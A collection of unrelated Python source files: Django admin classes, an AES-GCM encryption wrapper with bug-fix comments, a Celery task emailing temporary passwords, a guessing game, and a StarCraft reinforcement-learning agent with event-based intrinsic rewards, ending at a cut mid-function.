class OriginAdmin(admin.ModelAdmin):
    """Admin for Origin records linking people to places over time."""
    autocomplete_fields = ['person', 'place', 'origin_type']
    date_hierarchy = 'date'
    list_display = ['person', 'place', 'origin_type', 'date']
    list_filter = ['origin_type', 'place']
@admin.register(Profession)
class ProfessionAdmin(BaseALAdmin):
    """Admin for Profession; title list/search inherited from BaseALAdmin."""
    pass
@admin.register(Role)
class RoleAdmin(BaseALAdmin):
    """Admin for Role; title list/search inherited from BaseALAdmin."""
    pass
@admin.register(Source)
class SourceAdmin(admin.ModelAdmin):
    """Admin for archival Source records (classmark / microfilm)."""
    list_display = ['classmark', 'microfilm']
    search_fields = ['classmark', 'microfilm']
|
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad
class AES_OBJECT:
    """Thin wrapper around PyCryptodome AES supporting several block modes.

    NOTE(review): ``cifrar``/``descifrar`` call ``encrypt_and_digest`` /
    ``decrypt_and_verify``, which exist only on AEAD ciphers (e.g. GCM);
    calling them on ECB/CBC/CTR/OFB/CFB cipher objects would fail —
    presumably this class is only exercised in GCM mode, confirm with
    callers.
    """
    BLOCK_SIZE_AES = 16  # AES block size: 128 bits
    def __init__(self, key, mode, IV):
        """Store the key, AES mode constant and IV/nonce for later use."""
        self.key = key
        self.mode = mode
        self.IV = IV
    @staticmethod
    def generarClave():
        """Return a fresh random 128-bit AES key."""
        return get_random_bytes(AES_OBJECT.BLOCK_SIZE_AES)
    @staticmethod
    def generarIV():
        """Return a fresh random 128-bit IV/nonce."""
        return get_random_bytes(AES_OBJECT.BLOCK_SIZE_AES)
    def cifrar(self, cadena):
        """Encrypt the string *cadena*; return (ciphertext, MAC tag)."""
        return self.aes_factory().encrypt_and_digest(pad(cadena.encode("utf-8"), self.BLOCK_SIZE_AES))
    def descifrar(self, cifrado, mac):
        """Decrypt *cifrado* (bytes), verifying *mac*; return the plaintext str.

        Raises ValueError when the MAC does not match or padding is invalid.
        """
        return unpad(
            self.aes_factory().decrypt_and_verify(cifrado, mac),
            self.BLOCK_SIZE_AES
        ).decode("utf-8","ignore")
    def aes_factory(self):
        """Build a fresh cipher object for ``self.mode``.

        A new cipher is created per operation because PyCryptodome cipher
        objects are stateful (single-use for AEAD modes).
        """
        if self.mode == AES.MODE_ECB:
            return AES.new(self.key, self.mode)
        elif self.mode == AES.MODE_CBC:
            return AES.new(self.key, self.mode, self.IV)
        elif self.mode == AES.MODE_CTR:
            return AES.new(self.key, self.mode, nonce=self.IV)
        # BUG FIX: the original condition read
        # `self.mode == AES.MODE_OFB or AES.MODE_CFB`, and since the constant
        # AES.MODE_CFB is truthy the branch was taken for EVERY remaining
        # mode, making the GCM branch below unreachable (GCM still happened
        # to work because AES.new treats the third positional argument as the
        # nonce and mac_len defaults to 16, but only by coincidence).
        elif self.mode in (AES.MODE_OFB, AES.MODE_CFB):
            return AES.new(self.key, self.mode, self.IV)
        elif self.mode == AES.MODE_GCM:
            return AES.new(self.key, self.mode, nonce=self.IV, mac_len=self.BLOCK_SIZE_AES)
def crear_AESKey():
    """Return a random 16-byte (128-bit) AES key."""
    return AES_OBJECT.generarClave()
def crear_AESSource(key_16):
    """Build the sender-side AES object; return (aes_object, nonce).

    The freshly generated nonce must be shared with the receiver so it can
    build the matching destination object.
    """
    fresh_nonce = AES_OBJECT.generarIV()
    sender = AES_OBJECT(key_16, AES.MODE_GCM, fresh_nonce)
    return sender, fresh_nonce
def crear_AESDestination(key_16, nonce_16_ini):
    """Build the receiver-side AES object from the sender's initial nonce."""
    return AES_OBJECT(key_16, AES.MODE_GCM, nonce_16_ini)
def cifrarAES(aes_cifrado: AES_OBJECT, cadena):
    """Encrypt *cadena* (str); return (ciphertext_bytes, mac_tag)."""
    datos_cifrados, mac_cifrado = aes_cifrado.cifrar(cadena)
    return datos_cifrados, mac_cifrado
def descifrarAES(aes_descifrado: AES_OBJECT, datos, mac):
    """Decrypt *datos* (bytes) with *aes_descifrado* and verify *mac*.

    Returns the plaintext string, or False when decryption fails (MAC
    mismatch or bad padding).
    """
    try:
        return aes_descifrado.descifrar(datos, mac)
    # BUG FIX: was a bare `except:`, which also swallowed programming errors
    # and even KeyboardInterrupt/SystemExit. PyCryptodome signals MAC and
    # padding failures with ValueError, so only that is treated as "bad
    # ciphertext".
    except ValueError:
        return False
from __future__ import absolute_import, unicode_literals
from celery import shared_task
from django.core.mail import send_mail
@shared_task
def send_tmp_password(email, username, new_pwd):
    """Celery task: email a freshly issued temporary password to *email*.

    The message body tells the user (in Korean) that a temporary password
    was issued and asks them to change it after logging in.
    """
    subject = "Worka Service Team"
    body = (
        f"안녕하세요 {username}님 :)\n\nWorka에서 임시 비밀번호를 발급해드렸습니다."
        f"\n\n임시 비밀번호는 {new_pwd} 입니다. \n\n"
        "로그인 후 비밀번호를 변경해주세요 :)"
    )
    send_mail(subject, body, "workaservice@gmail.com", [email], fail_silently=False)
    return None
|
# Guessing game: ask "What's my favorite food?".
# Correct guess -> "Yep! So amazing!", otherwise -> "Yuck! That's not it!"
# Always finish with "Thanks for playing!"
favoriteFood = "Enchiladas"
userGuess = input("What's my favorite food? ")
print("Yep! So amazing!" if userGuess == favoriteFood else "Yuck! That's not it!")
print("Thanks for playing!")
|
import copy
import pickle
import numpy as np
from . import Agent
from reaver.envs.base import Env, MultiProcEnv
class RunningAgent(Agent):
    """
    Generic abstract class, defines API for interacting with an environment
    """
    def __init__(self):
        self.next_obs = None   # observation from the most recent env.step
        self.start_step = 0    # first step index (supports resuming)
        self.visualise = False
    def run(self, env: Env, expt, event_buffer=None, n_steps=1000000):
        """Wrap and start *env*, then drive the main loop for *n_steps*.

        BUG FIX: ``self.on_finish()`` used to be called unconditionally after
        the try/except, so on a normal (non-interrupted) run it executed
        twice — ``_run`` already calls it on its own exit path. It now runs
        only when the loop is aborted by KeyboardInterrupt, mirroring the
        cleanup ``_run`` performs on the normal path.
        """
        env = self.wrap_env(env)
        env.start()
        try:
            self._run(env, expt, event_buffer, n_steps)
        except KeyboardInterrupt:
            env.stop()
            self.on_finish()
    def _run(self, env, expt, event_buffer, n_steps):
        """Main agent/environment interaction loop.

        Relies heavily on module-level globals maintained by
        make_starting_variables and the save_*/getTriggered* helpers.
        """
        self.on_start()
        obs, *_ = env.reset()
        obs = [o.copy() for o in obs]
        # starting variables declaration
        make_starting_variables(expt, event_buffer, obs)
        # main running loop
        for step in range(self.start_step, self.start_step + n_steps):
            global previous_player_layers, previous_score_cumulative_layers, starting_values, episode_events
            # choose action and predict value
            action, value = self.get_action_and_value(obs)
            # take action and observe effects
            self.next_obs, reward, done = env.step(action)
            # breakdown the obs into layers
            screen_layers, minimap_layers, actions_layers, \
                player_layers, score_cumulative_layers = extract_obs_layers(self.next_obs)
            # normalise the score_cumulative stats before event detection
            score_cumulative_layers = remake_score_cumulative(score_cumulative_layers, previous_score_cumulative_layers,
                                                              player_layers, previous_player_layers, done)
            self.next_obs = remake_observations(screen_layers, minimap_layers, actions_layers,
                                                player_layers, score_cumulative_layers)
            previous_events = np.hstack((previous_player_layers, previous_score_cumulative_layers))
            current_events = np.hstack((player_layers, score_cumulative_layers))
            # episode_events = np.copy(previous_events)
            # first step of an episode: remember the starting stat values
            if previous_player_layers is None and previous_score_cumulative_layers is None:
                starting_values = np.copy(current_events)
            # find event triggers based on non-spatial features
            # Binary event triggers
            # event_triggers = getTriggeredBinaryEvents(done, previous_events, current_events)
            #
            # # Quantitative event triggers
            # event_triggers = getTriggeredQuantitativeEvents(done, previous_events, current_events)
            #
            # # Greedy event triggers
            event_triggers = getTriggeredGreedyEvents(done, previous_events, current_events, starting_values)
            #
            # # calculate intrinsic reward from event_triggers and event_buffer
            intrinsic_reward = calculate_intrinsic_reward(event_buffer, event_triggers, reward)
            # # remember reward, intrinsic rewards and events
            if previous_player_layers is not None and previous_score_cumulative_layers is not None:
                # No RoE
                # save_episode_events(previous_events, done)
                # Binary RoE
                # save_binary_episode_events(previous_events, current_events, done, event_triggers)
                # Quantitative RoE
                # save_quantitative_episode_events(previous_events, current_events, done, event_triggers)
                # Greedy RoE
                save_greedy_episode_events(previous_events, current_events, done, event_triggers, starting_values)
            if done[0]:
                record_final_events(step, expt, event_buffer)
            self.on_step(step, obs, action, intrinsic_reward, game_reward=reward, done=done, value=value)
            # reset the "previous" snapshots at episode boundaries
            if done[0]:
                previous_player_layers = None
                previous_score_cumulative_layers = None
            else:
                previous_player_layers = np.copy(player_layers)
                previous_score_cumulative_layers = np.copy(score_cumulative_layers)
            obs = [o.copy() for o in self.next_obs]
        env.stop()
        self.on_finish()
    def get_action_and_value(self, obs):
        """Default: delegate to get_action; subclasses may add a value estimate."""
        return self.get_action(obs), None
    def on_start(self):
        ...
    def on_step(self, step, obs, action, intrinsic_rew, game_reward, done, value=None):
        ...
    def on_finish(self):
        ...
    def wrap_env(self, env: Env) -> Env:
        """Hook for subclasses to wrap the environment (identity by default)."""
        return env
class SyncRunningAgent(RunningAgent):
    """
    Abstract class that handles synchronous multiprocessing via MultiProcEnv helper
    Not meant to be used directly, extending classes automatically get the feature
    """
    def __init__(self, n_envs):
        """Remember how many parallel environment copies to spawn."""
        RunningAgent.__init__(self)
        self.n_envs = n_envs
    def wrap_env(self, env: Env) -> Env:
        """Clone *env* n_envs times and bundle the clones in a MultiProcEnv.

        Rendering is switched off while deep-copying so only the original
        environment keeps its render flag.
        """
        saved_render, env.render = env.render, False
        env_copies = [env] + [copy.deepcopy(env) for _ in range(self.n_envs - 1)]
        env.render = saved_render
        return MultiProcEnv(env_copies)
def make_starting_variables(expt, event_buffer, obs):
    """Initialise the module-level bookkeeping used by RunningAgent._run.

    Sets the event counts, per-episode accumulators, the named indices into
    the concatenated player/score_cumulative non-spatial feature vector, and
    writes the header row of the text event log.

    expt: experiment handle providing .event_log_txt (path to the text log).
    event_buffer: buffer tracking event frequencies across episodes.
    obs: first observation batch; obs[-2]/obs[-1] are the player and
        score_cumulative layers, len(obs[0]) is the number of parallel envs.
    """
    global event_number, envs, \
        episode_intrinsic_rewards, episode_events, starting_broken_nsf, previous_broken_nsf, \
        supply_blocked_idle_production_time, previous_player_layers, previous_score_cumulative_layers
    global player_id, minerals, vespene, food_used, food_cap, food_army, food_workers, idle_worker_count, army_count, \
        warp_gate_count, larva_count, \
        score, idle_production_time, idle_worker_time, total_value_units, total_value_structures, \
        killed_value_units, killed_value_structures, collected_minerals, collected_vespene, \
        collection_rate_minerals, collection_rate_vespene, spent_minerals, spent_vespene
    global starting_values
    # total tracked non-spatial features = player + score_cumulative widths
    events_number = obs[-2].shape[1] + obs[-1].shape[1]
    event_buffer.set_event_number(events_number)
    event_number = event_buffer.get_events_number()
    envs = len(obs[0])
    # non_spatial_features_idx
    # player non spatial features and indices
    player_id = 0
    minerals = 1
    vespene = 2
    food_used = 3
    food_cap = 4
    food_army = 5
    food_workers = 6
    idle_worker_count = 7
    army_count = 8
    warp_gate_count = 9
    larva_count = 10
    # score cumulative non spatial features and indices
    score = 11
    idle_production_time = 12
    idle_worker_time = 13
    total_value_units = 14
    total_value_structures = 15
    killed_value_units = 16
    killed_value_structures = 17
    collected_minerals = 18
    collected_vespene = 19
    collection_rate_minerals = 20
    collection_rate_vespene = 21
    spent_minerals = 22
    spent_vespene = 23
    # episode_rewards = np.zeros([1, envs])
    episode_intrinsic_rewards = np.zeros([1, envs])
    episode_events = np.zeros([envs, event_number])
    starting_broken_nsf = np.zeros([envs, obs[-1].shape[1]])
    previous_broken_nsf = None
    supply_blocked_idle_production_time = np.zeros([envs])
    # final_rewards = np.zeros([1, envs])
    # final_intrinsic_rewards = np.zeros([1, envs])
    # final_events = np.zeros([envs, event_number])
    # event_triggers = None
    # write the header row (event indices) of the text event log
    with open(expt.event_log_txt, 'w') as outfile:
        np.savetxt(outfile, np.arange(event_number).reshape(1, event_number), fmt="%10.0f", delimiter="|")
        outfile.close()
    # None marks "first step of an episode" for the main loop
    previous_player_layers = None
    previous_score_cumulative_layers = None
    starting_values = None
def extract_obs_layers(obs):
    """Return independent copies of the five observation layers.

    Order: screen, minimap, available-actions, player stats, cumulative
    score stats. Copies are returned so callers can mutate them without
    touching the original observation.
    """
    screen, minimap, actions, player, score_cum = (np.copy(layer) for layer in obs[:5])
    return screen, minimap, actions, player, score_cum
def remake_observations(screen_layers, minimap_layers, actions_layers, player_layers, score_cumulative_layers):
    """Reassemble the five layers into the observation-list shape env code expects."""
    return [screen_layers, minimap_layers, actions_layers,
            player_layers, score_cumulative_layers]
def calculate_intrinsic_reward(event_buffer, event_triggers, reward):
    """Map per-env event triggers to intrinsic rewards via the event buffer.

    Side effect: accumulates the per-env rewards into the module-level
    ``episode_intrinsic_rewards`` tally. The environment's game reward is
    used only for its dtype/shape; the returned array contains intrinsic
    rewards exclusively.
    """
    global episode_intrinsic_rewards
    per_env_rewards = [event_buffer.intrinsic_reward(trigger) for trigger in event_triggers]
    episode_intrinsic_rewards += per_env_rewards
    out = np.array(reward, dtype=np.float64)
    for idx in range(len(reward)):
        out[idx] = per_env_rewards[idx]
    return out
def remake_score_cumulative(current_score_cumulative_layers, previous_score_cumulative_layers,
                            current_player_layers, previous_player_layers,
                            done):
    """Normalise the raw score_cumulative layer before event detection.

    Two corrections are applied:
    * idle_production_time is artificially incremented while the player is
      supply blocked (production is impossible, which would otherwise look
      like idleness that never grows);
    * counters that do not reset between episodes ("broken" non-spatial
      features) are re-based against the values recorded at episode start
      (tracked in the module globals starting_broken_nsf /
      previous_broken_nsf).

    Returns a patched copy of current_score_cumulative_layers; inputs are
    not modified. previous_score_cumulative_layers is None on the first
    step of an episode.
    """
    # nsf indices for the score cumulative layer
    # (local indices 0-12 apply to this layer only; the player-layer indices
    # food_cap/food_workers/food_army used below are module globals set by
    # make_starting_variables)
    score = 0
    idle_production_time = 1
    idle_worker_time = 2
    total_value_units = 3
    total_value_structures = 4
    killed_value_units = 5
    killed_value_structures = 6
    collected_minerals = 7
    collected_vespene = 8
    collection_rate_minerals = 9
    collection_rate_vespene = 10
    spent_minerals = 11
    spent_vespene = 12
    global supply_blocked_idle_production_time, previous_broken_nsf, starting_broken_nsf
    remade_cumulative_layer = np.copy(current_score_cumulative_layers)
    # increase idle production time if player is supply blocked
    if previous_score_cumulative_layers is not None:
        for i in range(len(done)):
            # supply blocked: used food reached the (sub-200) cap and the raw
            # idle_production_time did not advance on its own this step
            if current_player_layers[i][food_cap] <= current_player_layers[i][food_workers] + \
                    current_player_layers[i][food_army] and \
                    remade_cumulative_layer[i][idle_production_time] == \
                    previous_score_cumulative_layers[i][idle_production_time] - \
                    supply_blocked_idle_production_time[i] and \
                    current_player_layers[i][food_cap] < 200:
                supply_blocked_idle_production_time[i] += 1
            remade_cumulative_layer[i][idle_production_time] += supply_blocked_idle_production_time[i]
    # if it's the first step in the env than remember what it started with
    if previous_score_cumulative_layers is None:
        for i in range(len(done)):
            if previous_broken_nsf is not None:
                remade_cumulative_layer[i][idle_production_time] -= starting_broken_nsf[i][idle_production_time]
                remade_cumulative_layer[i][idle_worker_time] -= starting_broken_nsf[i][idle_worker_time]
                remade_cumulative_layer[i][total_value_units] -= starting_broken_nsf[i][total_value_units]
                remade_cumulative_layer[i][total_value_structures] -= starting_broken_nsf[i][total_value_structures]
                remade_cumulative_layer[i][spent_minerals] -= starting_broken_nsf[i][spent_minerals]
                remade_cumulative_layer[i][spent_vespene] -= starting_broken_nsf[i][spent_vespene]
            else:
                # very first episode: record the baseline the game starts with
                # (the -1 / -12 offsets are presumably the engine's initial
                # idle counters — TODO confirm)
                starting_broken_nsf[i][idle_production_time] = remade_cumulative_layer[i][idle_production_time] - 1
                starting_broken_nsf[i][idle_worker_time] = remade_cumulative_layer[i][idle_worker_time] - 12
                starting_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
                starting_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
                starting_broken_nsf[i][spent_minerals] = remade_cumulative_layer[i][spent_minerals]
                starting_broken_nsf[i][spent_vespene] = remade_cumulative_layer[i][spent_vespene]
    elif previous_broken_nsf is not None and not done[0]:
        # mid-episode step: subtract the episode-start baseline (guarded so a
        # counter that somehow dropped below baseline is left untouched)
        for i in range(len(done)):
            if remade_cumulative_layer[i][idle_production_time] >= starting_broken_nsf[i][idle_production_time]:
                remade_cumulative_layer[i][idle_production_time] -= starting_broken_nsf[i][idle_production_time]
                remade_cumulative_layer[i][idle_production_time] += supply_blocked_idle_production_time[i]
            if remade_cumulative_layer[i][idle_worker_time] >= starting_broken_nsf[i][idle_worker_time]:
                remade_cumulative_layer[i][idle_worker_time] -= starting_broken_nsf[i][idle_worker_time]
            if remade_cumulative_layer[i][total_value_units] >= starting_broken_nsf[i][total_value_units]:
                remade_cumulative_layer[i][total_value_units] -= starting_broken_nsf[i][total_value_units]
            if remade_cumulative_layer[i][total_value_structures] >= starting_broken_nsf[i][total_value_structures]:
                remade_cumulative_layer[i][total_value_structures] -= starting_broken_nsf[i][total_value_structures]
            if remade_cumulative_layer[i][spent_minerals] >= starting_broken_nsf[i][spent_minerals]:
                remade_cumulative_layer[i][spent_minerals] -= starting_broken_nsf[i][spent_minerals]
            if remade_cumulative_layer[i][spent_vespene] >= starting_broken_nsf[i][spent_vespene]:
                remade_cumulative_layer[i][spent_vespene] -= starting_broken_nsf[i][spent_vespene]
    elif done[0]:
        # episode boundary: roll the current counters into the baselines so
        # the next episode starts re-based from here
        if previous_broken_nsf is not None:
            starting_broken_nsf = np.copy(previous_broken_nsf)
            for i in range(len(remade_cumulative_layer)):
                previous_broken_nsf[i][idle_production_time] = remade_cumulative_layer[i][idle_production_time]
                previous_broken_nsf[i][idle_worker_time] = remade_cumulative_layer[i][idle_worker_time]
                previous_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
                previous_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
                previous_broken_nsf[i][spent_minerals] = remade_cumulative_layer[i][spent_minerals]
                previous_broken_nsf[i][spent_vespene] = remade_cumulative_layer[i][spent_vespene]
        else:
            previous_broken_nsf = np.copy(starting_broken_nsf)
            for i in range(len(remade_cumulative_layer)):
                previous_broken_nsf[i][idle_production_time] = remade_cumulative_layer[i][idle_production_time] + \
                                                               supply_blocked_idle_production_time[i]
                previous_broken_nsf[i][idle_worker_time] = remade_cumulative_layer[i][idle_worker_time]
                previous_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
                previous_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
                previous_broken_nsf[i][spent_minerals] = remade_cumulative_layer[i][spent_minerals]
                previous_broken_nsf[i][spent_vespene] = remade_cumulative_layer[i][spent_vespene]
        for i in range(len(remade_cumulative_layer)):
            if remade_cumulative_layer[i][idle_production_time] >= starting_broken_nsf[i][idle_production_time]:
                remade_cumulative_layer[i][idle_production_time] -= starting_broken_nsf[i][idle_production_time]
                remade_cumulative_layer[i][idle_production_time] += supply_blocked_idle_production_time[i]
            if remade_cumulative_layer[i][idle_worker_time] >= starting_broken_nsf[i][idle_worker_time]:
                remade_cumulative_layer[i][idle_worker_time] -= starting_broken_nsf[i][idle_worker_time]
            if remade_cumulative_layer[i][spent_minerals] >= starting_broken_nsf[i][spent_minerals]:
                remade_cumulative_layer[i][spent_minerals] -= starting_broken_nsf[i][spent_minerals]
            if remade_cumulative_layer[i][spent_vespene] >= starting_broken_nsf[i][spent_vespene]:
                remade_cumulative_layer[i][spent_vespene] -= starting_broken_nsf[i][spent_vespene]
            if remade_cumulative_layer[i][total_value_units] >= starting_broken_nsf[i][total_value_units]:
                remade_cumulative_layer[i][total_value_units] -= starting_broken_nsf[i][total_value_units]
            if remade_cumulative_layer[i][total_value_structures] >= starting_broken_nsf[i][total_value_structures]:
                remade_cumulative_layer[i][total_value_structures] -= starting_broken_nsf[i][total_value_structures]
            starting_broken_nsf[i][idle_production_time] = remade_cumulative_layer[i][idle_production_time]
            starting_broken_nsf[i][idle_worker_time] = remade_cumulative_layer[i][idle_worker_time]
            # starting_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
            # starting_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
            starting_broken_nsf[i][spent_minerals] = remade_cumulative_layer[i][spent_minerals]
            starting_broken_nsf[i][spent_vespene] = remade_cumulative_layer[i][spent_vespene]
            if previous_broken_nsf is not None:
                starting_broken_nsf[i][idle_production_time] = previous_broken_nsf[i][idle_production_time]
                starting_broken_nsf[i][idle_worker_time] = previous_broken_nsf[i][idle_worker_time]
                # starting_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
                # starting_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
                starting_broken_nsf[i][spent_minerals] = previous_broken_nsf[i][spent_minerals]
                starting_broken_nsf[i][spent_vespene] = previous_broken_nsf[i][spent_vespene]
        # reset the synthetic supply-blocked idle time for the new episode
        supply_blocked_idle_production_time = np.zeros(len(remade_cumulative_layer))
    return remade_cumulative_layer
def save_episode_events(previous_events, done):
    """Overwrite the module-level episode_events with the latest raw stats.

    "No RoE" variant: instead of accumulating triggers, the episode record
    is simply the last observed non-spatial feature values. No-op on the
    first step of an episode (previous_events is None) or once it is done.
    """
    global episode_events
    if previous_events is None or done[0]:
        return
    for env_no in range(len(previous_events)):
        for nsf_idx in range(len(previous_events[0])):
            episode_events[env_no][nsf_idx] = previous_events[env_no][nsf_idx]
def save_binary_episode_events(previous_events, current_events, done, event_triggers, staring_events=None):
    """Accumulate binary (0/1) event triggers into the episode totals.

    Only ``event_triggers`` is used; the other parameters keep the signature
    interchangeable with the sibling save_*_episode_events variants.
    (NOTE: 'staring_events' is presumably a typo for 'starting_events'.)
    """
    global episode_events
    episode_events += event_triggers
def save_quantitative_episode_events(previous_events, current_events, done, event_triggers):
    """Accumulate quantitative event triggers into the episode totals.

    On non-terminal steps, idle-worker count and collection rates are
    overwritten with their current absolute values (they are snapshots, not
    accumulable deltas), and all totals are clamped at zero.
    NOTE(review): idle_worker_count / collection_rate_* used below are the
    module-level indices set by make_starting_variables — the local
    definitions are commented out.
    """
    global episode_events
    # global idle_worker_count
    # non_spatial_features_idx
    # player non spatial features and indices
    # player_id = 0
    # minerals = 1
    # vespene = 2
    # food_used = 3
    # food_cap = 4
    # food_army = 5
    # food_workers = 6
    # idle_worker_count = 7
    # army_count = 8
    # warp_gate_count = 9
    # larva_count = 10
    # # score cumulative non spatial features and indices
    # score = 11
    # idle_production_time = 12
    # idle_worker_time = 13
    # total_value_units = 14
    # total_value_structures = 15
    # killed_value_units = 16
    # killed_value_structures = 17
    # collected_minerals = 18
    # collected_vespene = 19
    # collection_rate_minerals = 20
    # collection_rate_vespene = 21
    # spent_minerals = 22
    # spent_vespene = 23
    episode_events += event_triggers
    if not done[0]:
        for env_no in range(len(current_events)):
            # snapshot-style stats are replaced rather than accumulated
            episode_events[env_no][idle_worker_count] = current_events[env_no][idle_worker_count]
            episode_events[env_no][collection_rate_minerals] = current_events[env_no][collection_rate_minerals]
            episode_events[env_no][collection_rate_vespene] = current_events[env_no][collection_rate_vespene]
            # clamp every accumulated total at zero
            for i in range(len(current_events[0])):
                if episode_events[env_no][i] < 0:
                    episode_events[env_no][i] = 0
def save_greedy_episode_events(previous_events, current_events, done, event_triggers, staring_events=None):
    """Accumulate greedy event triggers into the episode totals.

    After accumulating ``event_triggers``, growth-style stats are overwritten
    with their progress relative to the episode-start values
    (``staring_events`` — presumably a typo for 'starting_events'; kept for
    call compatibility), idle-worker count is replaced by its current value,
    and all totals are clamped at zero.
    NOTE(review): the feature indices used below (idle_worker_count,
    food_cap, score, ...) are module globals set by make_starting_variables;
    the local definitions are commented out.
    """
    global episode_events
    # non_spatial_features_idx
    # player non spatial features and indices
    # player_id = 0
    # minerals = 1
    # vespene = 2
    # food_used = 3
    # food_cap = 4
    # food_army = 5
    # food_workers = 6
    # idle_worker_count = 7
    # army_count = 8
    # warp_gate_count = 9
    # larva_count = 10
    # # score cumulative non spatial features and indices
    # score = 11
    # idle_production_time = 12
    # idle_worker_time = 13
    # total_value_units = 14
    # total_value_structures = 15
    # killed_value_units = 16
    # killed_value_structures = 17
    # collected_minerals = 18
    # collected_vespene = 19
    # collection_rate_minerals = 20
    # collection_rate_vespene = 21
    # spent_minerals = 22
    # spent_vespene = 23
    episode_events += event_triggers
    # if previous_events is None:
    #     for env_no in range(len(current_events)):
    #         episode_events[env_no][minerals] += staring_events[env_no][minerals]
    if previous_events is not None and not done[0]:
        for env_no in range(len(previous_events)):
            #
            # episode_events[env_no][score] = current_events[env_no][score]
            # episode_events[env_no][food_cap] = current_events[env_no][food_cap] - staring_events[env_no][food_cap]
            # episode_events[env_no][food_army] = current_events[env_no][food_army] - staring_events[env_no][food_army]
            # episode_events[env_no][food_workers] = current_events[env_no][food_workers] - staring_events[env_no][food_workers]
            # episode_events[env_no][food_used] = current_events[env_no][food_used] - staring_events[env_no][food_used]
            #
            # episode_events[env_no][total_value_units] = current_events[env_no][total_value_units] - \
            #                                             staring_events[env_no][total_value_units]
            #
            # episode_events[env_no][total_value_structures] = current_events[env_no][total_value_structures] - \
            #                                                  staring_events[env_no][total_value_structures]
            #
            # episode_events[env_no][collected_minerals] = current_events[env_no][collected_minerals]
            # episode_events[env_no][collected_vespene] = current_events[env_no][collected_vespene]
            # episode_events[env_no][collection_rate_minerals] = current_events[env_no][collection_rate_minerals]
            # episode_events[env_no][collection_rate_vespene] = current_events[env_no][collection_rate_vespene]
            # idle-worker count is a snapshot, not an accumulable delta
            episode_events[env_no][idle_worker_count] = current_events[env_no][idle_worker_count]
            # growth-style stats: record progress relative to episode start
            for event_idx in range(event_triggers.shape[1]):
                if event_idx in [
                    # minerals, vespene, food_used,
                    food_cap, food_workers, food_army, army_count,
                    warp_gate_count, larva_count,
                    score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
                    collected_minerals, collected_vespene,
                    collection_rate_minerals, collection_rate_vespene,
                    # spent_minerals, spent_vespene
                ]:
                    episode_events[env_no][event_idx] = current_events[env_no][event_idx] - \
                                                        staring_events[env_no][event_idx]
            # clamp every total at zero
            for i in range(len(current_events[0])):
                if episode_events[env_no][i] < 0:
                    episode_events[env_no][i] = 0
def record_final_events(step, expt, event_buffer):
    """Flush the per-episode event totals into the buffer and log files.

    Copies the accumulated module-level ``episode_events`` into the event
    buffer (one record per env), resets the per-episode accumulators,
    appends a human-readable row per env to the text log, and pickles the
    whole buffer.
    Improvement over the original: the redundant explicit ``close()`` calls
    inside the ``with`` blocks were removed — the context manager already
    closes the files.
    """
    global episode_events, episode_intrinsic_rewards, previous_broken_nsf, starting_broken_nsf
    final_events = np.zeros([envs, event_number])
    final_events += episode_events
    # reset per-episode accumulators for the next episode
    episode_intrinsic_rewards = np.zeros([1, envs])
    episode_events = np.zeros([envs, event_number])
    for i in range(len(final_events)):
        event_buffer.record_events(np.copy(final_events[i]), frame=step)
    # build one "idx: value |" row per env for the text log
    event_str = ""
    for j in range(final_events.shape[0]):
        for i in range(len(final_events[0])):
            event_str += "{:2d}: {:5.0f} |".format(i, final_events[j][i])
        event_str += "\n"
    event_str += "\n"
    with open(expt.event_log_txt, 'a') as outfile:
        outfile.write(event_str)
    with open(expt.event_log_pkl, "wb") as f:
        pickle.dump(event_buffer, f)
def getTriggeredBinaryEvents(done, previous_events, current_events):
    """Return a (n_envs, n_events) 0/1 matrix of events triggered this step.

    A growth-style stat triggers when it increased since the previous step;
    the two idle-time stats trigger when the counter did NOT grow (i.e.
    nothing was idle). Returns all zeros on the first step of an episode or
    when the episode just ended (the module globals previous_player_layers /
    previous_score_cumulative_layers serve as the first-step sentinel).
    """
    # non_spatial_features_idx
    # player non spatial features and indices
    player_id = 0
    minerals = 1
    vespene = 2
    food_used = 3
    food_cap = 4
    food_army = 5
    food_workers = 6
    idle_worker_count = 7
    army_count = 8
    warp_gate_count = 9
    larva_count = 10
    # score cumulative non spatial features and indices
    score = 11
    idle_production_time = 12
    idle_worker_time = 13
    total_value_units = 14
    total_value_structures = 15
    killed_value_units = 16
    killed_value_structures = 17
    collected_minerals = 18
    collected_vespene = 19
    collection_rate_minerals = 20
    collection_rate_vespene = 21
    spent_minerals = 22
    spent_vespene = 23
    event_triggers = np.zeros([len(current_events), len(current_events[0])])
    if previous_player_layers is None or previous_score_cumulative_layers is None or done[0]:
        return event_triggers
    for env_no in range(event_triggers.shape[0]):
        for event_idx in range(event_triggers.shape[1]):
            if event_idx in [
                minerals, vespene, food_used, food_cap, food_workers, food_army, army_count,
                warp_gate_count, larva_count,
                score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
                collected_minerals, collected_vespene, collection_rate_minerals, collection_rate_vespene,
                spent_minerals, spent_vespene
            ]:
                if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = 1
            elif event_idx in [idle_production_time, idle_worker_time]:
                if current_events[env_no][event_idx] == previous_events[env_no][event_idx]:
                    event_triggers[env_no][event_idx] = 1
    # no production reward if supply blocked
    # BUG FIX: the original condition mixed `and`/`or` without parentheses
    # (`A and B or C` parses as `(A and B) or C`), so the production trigger
    # was zeroed whenever the army count was unchanged — even when not supply
    # blocked. Now an `and`-chain, consistent with
    # getTriggeredQuantitativeEvents.
    for env_no in range(event_triggers.shape[0]):
        if current_events[env_no][food_workers] + current_events[env_no][food_army] == current_events[env_no][food_cap] < 200 and \
                current_events[env_no][food_workers] == previous_events[env_no][food_workers] and \
                current_events[env_no][food_army] == previous_events[env_no][food_army]:
            event_triggers[env_no][idle_production_time] = 0
    return event_triggers
def getTriggeredQuantitativeEvents(done, previous_events, current_events):
